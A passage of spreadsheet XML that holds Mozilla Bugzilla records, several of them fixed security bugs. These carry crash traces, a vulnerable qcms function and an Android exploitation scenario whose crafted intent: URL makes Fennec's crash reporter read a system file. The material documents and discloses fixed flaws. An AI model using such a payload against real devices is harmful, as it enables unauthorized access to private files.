        <is>
          <t>2015-02-12 07:46:55 -0800</t>
        </is>
      </c>
      <c r="C5156" t="inlineStr">
        <is>
          <t>[qcms] heap info leak</t>
        </is>
      </c>
      <c r="D5156" t="inlineStr">
        <is>
          <t>2016-07-02 10:11:15 -0700</t>
        </is>
      </c>
      <c r="E5156" t="n">
        <v>1</v>
      </c>
      <c r="F5156" t="n">
        <v>1</v>
      </c>
      <c r="G5156" t="n">
        <v>3</v>
      </c>
      <c r="H5156" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5156" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5156" t="inlineStr">
        <is>
          <t>Graphics: Color Management</t>
        </is>
      </c>
      <c r="K5156" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5156" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5156" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5156" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5156" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5156" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q5156" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5156" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5156" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T5156" t="n">
        <v>1</v>
      </c>
      <c r="U5156" t="n">
        <v>0</v>
      </c>
      <c r="V5156" t="n">
        <v>15</v>
      </c>
      <c r="W5156" t="inlineStr">
        <is>
          <t>Created attachment 8563424
98c8e33029be249da9724c3836486677
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Steps to reproduce:
Load sample 98c8e33029be249da9724c3836486677 or 11dcaacb804945e4574317fc56ebc5d3 in a transformation.
Actual results:
heap-buffer-overflow READ of size 4
lut_interp_linear_float third_party/qcms/src/transform_util.c:101:17
or
Program received signal SIGSEGV, Segmentation fault.
lut_interp_linear_float (value=1.35335546e+18, table=0x7ffff6a02050, length=0)
    at third_party/qcms/src/transform_util.c:101
101             value = table[upper]*(1. - (upper - value)) + table[lower]*(upper - value);
float lut_interp_linear_float(float value, float *table, size_t length)
{
        int upper, lower;
        value = value * (length - 1);
// If length is 0, value will have been adjusted to an arbitrary large float.
        upper = ceil(value);
        lower = floor(value);
        value = table[upper]*(1. - (upper - value)) + table[lower]*(upper - value);
// Here the ASAN alert or SIGSEGV occurs.
        return value;
}
Potentially this can be used for disclosing memory contents.</t>
        </is>
      </c>
      <c r="X5156" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5157">
      <c r="A5157" t="n">
        <v>1180831</v>
      </c>
      <c r="B5157" t="inlineStr">
        <is>
          <t>2015-07-06 11:54:09 -0700</t>
        </is>
      </c>
      <c r="C5157" t="inlineStr">
        <is>
          <t>support supersearch field "SafeMode"</t>
        </is>
      </c>
      <c r="D5157" t="inlineStr">
        <is>
          <t>2015-09-28 08:03:59 -0700</t>
        </is>
      </c>
      <c r="E5157" t="n">
        <v>1</v>
      </c>
      <c r="F5157" t="n">
        <v>1</v>
      </c>
      <c r="G5157" t="n">
        <v>4</v>
      </c>
      <c r="H5157" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5157" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5157" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5157" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5157" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5157" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5157" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5157" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5157" t="inlineStr"/>
      <c r="Q5157" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5157" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5157" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5157" t="n">
        <v>1</v>
      </c>
      <c r="U5157" t="n">
        <v>0</v>
      </c>
      <c r="V5157" t="n">
        <v>8</v>
      </c>
      <c r="W5157" t="inlineStr">
        <is>
          <t>Bug 1171677 (part 1) added annotation for whether we were in safe mode or not; since we want to prioritize safe mode crashes, we want to expose searching for, and seeing this value in the reports.</t>
        </is>
      </c>
      <c r="X5157" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5158">
      <c r="A5158" t="n">
        <v>1353438</v>
      </c>
      <c r="B5158" t="inlineStr">
        <is>
          <t>2017-04-04 09:49:43 -0700</t>
        </is>
      </c>
      <c r="C5158" t="inlineStr">
        <is>
          <t>[ux] SVG assets for tab loading/connecting animation</t>
        </is>
      </c>
      <c r="D5158" t="inlineStr">
        <is>
          <t>2017-05-24 08:36:25 -0700</t>
        </is>
      </c>
      <c r="E5158" t="n">
        <v>1</v>
      </c>
      <c r="F5158" t="n">
        <v>1</v>
      </c>
      <c r="G5158" t="n">
        <v>2</v>
      </c>
      <c r="H5158" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5158" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5158" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5158" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L5158" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5158" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5158" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5158" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5158" t="inlineStr">
        <is>
          <t>[photon-animation] [ux]</t>
        </is>
      </c>
      <c r="Q5158" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5158" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5158" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5158" t="n">
        <v>1</v>
      </c>
      <c r="U5158" t="n">
        <v>0</v>
      </c>
      <c r="V5158" t="n">
        <v>4</v>
      </c>
      <c r="W5158" t="inlineStr">
        <is>
          <t>The animation has two parts, the connecting/loading part and the pulse from start-to-end part.
The engineer team will need the SVG asset for the connecting/loading part.
I believe the pulse should be possible with a large gradient that shows a color at a 45-degree angle, and then the gradient will move vertically through the viewport, which will give the effect of the pulse moving from left-to-right (in RTL builds it will move right-to-left).</t>
        </is>
      </c>
      <c r="X5158" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5159">
      <c r="A5159" t="n">
        <v>1208520</v>
      </c>
      <c r="B5159" t="inlineStr">
        <is>
          <t>2015-09-25 08:59:20 -0700</t>
        </is>
      </c>
      <c r="C5159" t="inlineStr">
        <is>
          <t>Firefox Search on Android allows to open an arbitrary activity with Fennec's privilege</t>
        </is>
      </c>
      <c r="D5159" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:48 -0700</t>
        </is>
      </c>
      <c r="E5159" t="n">
        <v>1</v>
      </c>
      <c r="F5159" t="n">
        <v>1</v>
      </c>
      <c r="G5159" t="n">
        <v>6</v>
      </c>
      <c r="H5159" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5159" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5159" t="inlineStr">
        <is>
          <t>Search Activity</t>
        </is>
      </c>
      <c r="K5159" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L5159" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5159" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5159" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5159" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5159" t="inlineStr">
        <is>
          <t xml:space="preserve">[adv-main42+] Severity depends on other installed apps </t>
        </is>
      </c>
      <c r="Q5159" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5159" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5159" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T5159" t="n">
        <v>1</v>
      </c>
      <c r="U5159" t="n">
        <v>0</v>
      </c>
      <c r="V5159" t="n">
        <v>34</v>
      </c>
      <c r="W5159" t="inlineStr">
        <is>
          <t>Created attachment 8666055
intent.pdf
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.42 Safari/537.36
Steps to reproduce:
The following commit introduced a security bug that allows any web contents to open an arbitrary activity with Fennec's privilege.
https://hg.mozilla.org/mozilla-central/rev/05645d479d89
This code is used by search widget on Android when a search result navigates to an intent: URL. Then this code directly use given intent: URL for starting activity. This is wrong it should be handled like Bug 851693 (e.g., adding Intent.CATEGORY_BROWSABLE).
The following is a possible exploitation scenario.
1. Open a search engine URL http://mallory.csrf.jp/search.html on Fennec
2. Long tap an text input in a page and register it as a search engine
3. In settings menu, choose it as a default search engine for search widget
4. Searche any words via search widget on the registered search engine, then the search result open a following intent: URL
intent://#Intent;action=org.mozilla.gecko.reportCrash;package=org.mozilla.fennec;component=org.mozilla.fennec/org.mozilla.gecko.CrashReporter;S.minidumpPath=%2fsystem%2fbuild.prop;end
5. Fennec opens the link and the private hidden crash reporter activity is shown by Fennec's own privilege.
6. Then the parameter minidumpPath=%2fsystem%2fbuild.prop given by the content makes crash reporter to open /system/build.prop file on Fennec's privilege
Then the following log may be put on adb if you use an Android device that OS version is before 4.4.
I/GeckoCrashReporter(29235): moving /system/build.prop to /data/data/org.mozilla.fennec/files/mozilla/Crash Reports/pending/build.prop
I attached a PDF introducing steps to reproduce.</t>
        </is>
      </c>
      <c r="X5159" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5160">
      <c r="A5160" t="n">
        <v>1427936</v>
      </c>
      <c r="B5160" t="inlineStr">
        <is>
          <t>2018-01-03 19:24:48 -0800</t>
        </is>
      </c>
      <c r="C5160" t="inlineStr">
        <is>
          <t>Basic Payment Request Display Items list UI</t>
        </is>
      </c>
      <c r="D5160" t="inlineStr">
        <is>
          <t>2018-04-30 18:25:30 -0700</t>
        </is>
      </c>
      <c r="E5160" t="n">
        <v>1</v>
      </c>
      <c r="F5160" t="n">
        <v>1</v>
      </c>
      <c r="G5160" t="n">
        <v>2</v>
      </c>
      <c r="H5160" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5160" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5160" t="inlineStr">
        <is>
          <t>WebPayments UI</t>
        </is>
      </c>
      <c r="K5160" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5160" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5160" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5160" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5160" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5160" t="inlineStr">
        <is>
          <t>[webpayments]</t>
        </is>
      </c>
      <c r="Q5160" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5160" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5160" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T5160" t="n">
        <v>1</v>
      </c>
      <c r="U5160" t="n">
        <v>0</v>
      </c>
      <c r="V5160" t="n">
        <v>20</v>
      </c>
      <c r="W5160" t="inlineStr">
        <is>
          <t>Render the `state.request.paymentDetails.displayItems` in a list format using the `PaymentStateSubscriberMixin` and add a toggle to the dialog to toggle the list view visibility.
Display Items should use the &lt;currency-amount&gt; custom element.</t>
        </is>
      </c>
      <c r="X5160" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5161">
      <c r="A5161" t="n">
        <v>1270537</v>
      </c>
      <c r="B5161" t="inlineStr">
        <is>
          <t>2016-05-05 08:59:27 -0700</t>
        </is>
      </c>
      <c r="C5161" t="inlineStr">
        <is>
          <t>woff2: heap-buffer-overflow write in [@ReconstructGlyf]</t>
        </is>
      </c>
      <c r="D5161" t="inlineStr">
        <is>
          <t>2020-02-05 22:02:34 -0800</t>
        </is>
      </c>
      <c r="E5161" t="n">
        <v>1</v>
      </c>
      <c r="F5161" t="n">
        <v>1</v>
      </c>
      <c r="G5161" t="n">
        <v>3</v>
      </c>
      <c r="H5161" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5161" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5161" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K5161" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L5161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5161" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5161" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5161" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5161" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main48+]</t>
        </is>
      </c>
      <c r="Q5161" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5161" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5161" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T5161" t="n">
        <v>1</v>
      </c>
      <c r="U5161" t="n">
        <v>0</v>
      </c>
      <c r="V5161" t="n">
        <v>27</v>
      </c>
      <c r="W5161" t="inlineStr">
        <is>
          <t>Created attachment 8749237
test_case.woff2
Found while fuzzing woff2 commit 2bc6acf6dfa2f6dd2f8da63b4fe2e27851e45e11
==61217==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62600000e960 at pc 0x0000004a79b6 bp 0x7ffd6de31c50 sp 0x7ffd6de31400
WRITE of size 10320 at 0x62600000e960 thread T0
    #0 0x4a79b5 in __asan_memcpy /home/user/Desktop/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:421
    #1 0x51f620 in woff2::Buffer::Read(unsigned char*, unsigned long) /home/user/code/woff2/./src/./buffer.h:86:7
    #2 0x51f620 in woff2::(anonymous namespace)::ReconstructGlyf(unsigned char const*, woff2::Table*, unsigned int*, woff2::Table*, unsigned int*, woff2::(anonymous namespace)::WOFF2FontInfo*, woff2::WOFF2Out*) /home/user/code/woff2/src/woff2_dec.cc:500
    #3 0x51f620 in woff2::(anonymous namespace)::ReconstructFont(unsigned char*, unsigned int, woff2::(anonymous namespace)::RebuildMetadata*, woff2::(anonymous namespace)::WOFF2Header*, unsigned long, woff2::WOFF2Out*) /home/user/code/woff2/src/woff2_dec.cc:917
    #4 0x51f620 in woff2::ConvertWOFF2ToTTF(unsigned char const*, unsigned long, woff2::WOFF2Out*) /home/user/code/woff2/src/woff2_dec.cc:1282
    #5 0x572252 in fuzz(char*) /home/user/code/woff2/src/woff2_decompress.cc:36:19
    #6 0x5739a2 in main /home/user/code/woff2/src/woff2_decompress.cc:52:10
    #7 0x7f4e38ee4ec4 in __libc_start_main /build/eglibc-3GlaMS/eglibc-2.19/csu/libc-start.c:287
    #8 0x420f75 in _start (/home/user/Desktop/woff2/woff2_decompress+0x420f75)</t>
        </is>
      </c>
      <c r="X5161" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5162">
      <c r="A5162" t="n">
        <v>802893</v>
      </c>
      <c r="B5162" t="inlineStr">
        <is>
          <t>2012-10-17 17:18:54 -0700</t>
        </is>
      </c>
      <c r="C5162" t="inlineStr">
        <is>
          <t>[OTA update] Set up otoro_stable builds &amp; update process to match unagi_stable</t>
        </is>
      </c>
      <c r="D5162" t="inlineStr">
        <is>
          <t>2012-10-22 19:41:54 -0700</t>
        </is>
      </c>
      <c r="E5162" t="n">
        <v>1</v>
      </c>
      <c r="F5162" t="n">
        <v>1</v>
      </c>
      <c r="G5162" t="n">
        <v>6</v>
      </c>
      <c r="H5162" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5162" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5162" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5162" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5162" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5162" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5162" t="inlineStr">
        <is>
          <t>[ota update]</t>
        </is>
      </c>
      <c r="Q5162" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5162" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5162" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5162" t="n">
        <v>1</v>
      </c>
      <c r="U5162" t="n">
        <v>0</v>
      </c>
      <c r="V5162" t="n">
        <v>9</v>
      </c>
      <c r="W5162" t="inlineStr">
        <is>
          <t>We'll want this by the end of the week so that devs &amp; testers with otoro devices are able to stay in lock-step with our unagi testers (and devs/QA working with stable updates).
I believe this means:
otoro_stable nightly builds that can be built as stable &amp; the associated nightly promoted_to_stable with the same script as bug 801711 implemented.
otoro_stable to otoro_stable update channel &amp; mars (if the dogfooding_prerelease functionality is enabled here too - bonus!)
If I'm missing anything please call it out.</t>
        </is>
      </c>
      <c r="X5162" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5163">
      <c r="A5163" t="n">
        <v>1146937</v>
      </c>
      <c r="B5163" t="inlineStr">
        <is>
          <t>2015-03-24 08:04:24 -0700</t>
        </is>
      </c>
      <c r="C5163" t="inlineStr">
        <is>
          <t>INC0015386 - PAR1 - 118 SAUCISSION - iPad Controller and Eventboard: Dropping Off Network</t>
        </is>
      </c>
      <c r="D5163" t="inlineStr">
        <is>
          <t>2015-11-16 13:42:51 -0800</t>
        </is>
      </c>
      <c r="E5163" t="n">
        <v>1</v>
      </c>
      <c r="F5163" t="n">
        <v>1</v>
      </c>
      <c r="G5163" t="n">
        <v>5</v>
      </c>
      <c r="H5163" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5163" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J5163" t="inlineStr">
        <is>
          <t>AVOps: Crestron</t>
        </is>
      </c>
      <c r="K5163" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5163" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5163" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5163" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5163" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5163" t="inlineStr">
        <is>
          <t xml:space="preserve">INC0015386 </t>
        </is>
      </c>
      <c r="Q5163" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5163" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5163" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5163" t="n">
        <v>1</v>
      </c>
      <c r="U5163" t="n">
        <v>0</v>
      </c>
      <c r="V5163" t="n">
        <v>8</v>
      </c>
      <c r="W5163" t="inlineStr">
        <is>
          <t>We are getting reports from Paris that the Ipad room controllers and Eventboards are not staying connected to the WiFi in Paris Conference rooms.  Specifically, Saucisson and Allo Allo.  Guillermo had experience the same issues while onsite.  Shannon Clayton also reported the issue and has seen this with user laptops dropping as well. 
Comment in ServiceNow Ticket:
Some laptops in the office are also being knocked off the Mozilla SSID a few times a day, there is an open bug for it here: https://bugzilla.mozilla.org/show_bug.cgi?id=1129972
Service Now  INC0015386</t>
        </is>
      </c>
      <c r="X5163" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5164">
      <c r="A5164" t="n">
        <v>1368490</v>
      </c>
      <c r="B5164" t="inlineStr">
        <is>
          <t>2017-05-29 07:40:45 -0700</t>
        </is>
      </c>
      <c r="C5164" t="inlineStr">
        <is>
          <t>Write past end of allocation in InterleaveTrackData</t>
        </is>
      </c>
      <c r="D5164" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:52 -0700</t>
        </is>
      </c>
      <c r="E5164" t="n">
        <v>1</v>
      </c>
      <c r="F5164" t="n">
        <v>1</v>
      </c>
      <c r="G5164" t="n">
        <v>3</v>
      </c>
      <c r="H5164" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5164" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5164" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K5164" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L5164" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5164" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5164" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5164" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5164" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q5164" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5164" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5164" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5164" t="n">
        <v>1</v>
      </c>
      <c r="U5164" t="n">
        <v>0</v>
      </c>
      <c r="V5164" t="n">
        <v>36</v>
      </c>
      <c r="W5164" t="inlineStr">
        <is>
          <t>Created attachment 8872359
poc.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce:
open the file and it will crash. now you added the vector accessor checks. in tor browser in my last test was maybe exploitable because didnt have that check
Actual results:
=================================================================
==23790==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000051b5b6 bp 0x7fa3d2c89e50 sp 0x7fa3d2c89ce0 T25)
==23790==The signal is caused by a WRITE memory access.
==23790==Hint: address points to the zero page.
    #0 0x51b5b5 in MOZ_CrashPrintf /home/worker/workspace/build/src/mfbt/Assertions.cpp:63:3
    #1 0x7fa4370e5ebf in InvalidArrayIndex_CRASH(unsigned long, unsigned long) /home/worker/workspace/build/src/xpcom/ds/nsTArray.cpp:26:3
    #2 0x7fa43c182296 in ElementAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1043:7
    #3 0x7fa43c182296 in operator[] /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1081
    #4 0x7fa43c182296 in mozilla::AudioTrackEncoder::InterleaveTrackData(mozilla::AudioChunk&amp;, int, unsigned int, float*) /home/worker/workspace/build/src/dom/media/encoder/TrackEncoder.cpp:151
    #5 0x7fa43c17dfd7 in mozilla::OpusTrackEncoder::GetEncodedTrack(mozilla::EncodedFrameContainer&amp;) /home/worker/workspace/build/src/dom/media/encoder/OpusTrackEncoder.cpp:349:9
    #6 0x7fa43c1794a6 in mozilla::MediaEncoder::WriteEncodedDataToMuxer(mozilla::TrackEncoder*) /home/worker/workspace/build/src/dom/media/encoder/MediaEncoder.cpp:344:32
    #7 0x7fa43c1779f5 in mozilla::MediaEncoder::GetEncodedData(nsTArray&lt;nsTArray&lt;unsigned char&gt; &gt;*, nsAString&amp;) /home/worker/workspace/build/src/dom/media/encoder/MediaEncoder.cpp:290:12
    #8 0x7fa43c0aa574 in mozilla::dom::MediaRecorder::Session::Extract(bool) /home/worker/workspace/build/src/dom/media/MediaRecorder.cpp:620:15
    #9 0x7fa43c0aa0aa in mozilla::dom::MediaRecorder::Session::ExtractRunnable::Run() /home/worker/workspace/build/src/dom/media/MediaRecorder.cpp:278:19
    #10 0x7fa4371bd02e in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1321:14
    #11 0x7fa4371c8db8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:472:10
    #12 0x7fa437f6e800 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:338:20
    #13 0x7fa437ecae00 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #14 0x7fa437ecae00 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #15 0x7fa437ecae00 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #16 0x7fa4371b5502 in nsThread::ThreadFunc(void*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:501:11
    #17 0x7fa4517d8453 in _pt_root /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:216:5
    #18 0x7fa45519f6d9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76d9)
    #19 0x7fa45422517e in clone /build/glibc-cxyGtm/glibc-2.24/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:105
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/worker/workspace/build/src/mfbt/Assertions.cpp:63:3 in MOZ_CrashPrintf
Thread T25 (Media_Encoder) created by T0 (Web Content) here:
    #0 0x4a3d56 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:245:3
    #1 0x7fa4517d51f9 in _PR_CreateThread /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7fa4517d4e0e in PR_CreateThread /home/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7fa4371b7737 in nsThread::Init(nsACString const&amp;) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:682:8
    #4 0x7fa4371c1fff in nsThreadManager::NewNamedThread(nsACString const&amp;, unsigned int, nsIThread**) /home/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:273:22
    #5 0x7fa4371c4213 in NS_NewNamedThread(nsACString const&amp;, nsIThread**, nsIRunnable*, unsigned int) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:113:45
    #6 0x7fa43c0a5a2a in NS_NewNamedThread&lt;14&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:72:10
    #7 0x7fa43c0a5a2a in mozilla::dom::MediaRecorder::Session::InitEncoder(unsigned char, int) /home/worker/workspace/build/src/dom/media/MediaRecorder.cpp:771
    #8 0x7fa43c0a6b3f in mozilla::dom::MediaRecorder::Session::TracksAvailableCallback::NotifyTracksAvailable(mozilla::DOMMediaStream*) /home/worker/workspace/build/src/dom/media/MediaRecorder.cpp:355:17
    #9 0x7fa43be42753 in mozilla::DOMMediaStream::CheckTracksAvailable() /home/worker/workspace/build/src/dom/media/DOMMediaStream.cpp:1287:19
    #10 0x7fa43be5f112 in applyImpl&lt;mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1084:12
    #11 0x7fa43be5f112 in apply&lt;mozilla::DOMMediaStream, void (mozilla::DOMMediaStream::*)()&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1090
    #12 0x7fa43be5f112 in mozilla::detail::RunnableMethodImpl&lt;mozilla::DOMMediaStream*, void (mozilla::DOMMediaStream::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1133
    #13 0x7fa4371bd02e in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1321:14
    #14 0x7fa4371c8db8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:472:10
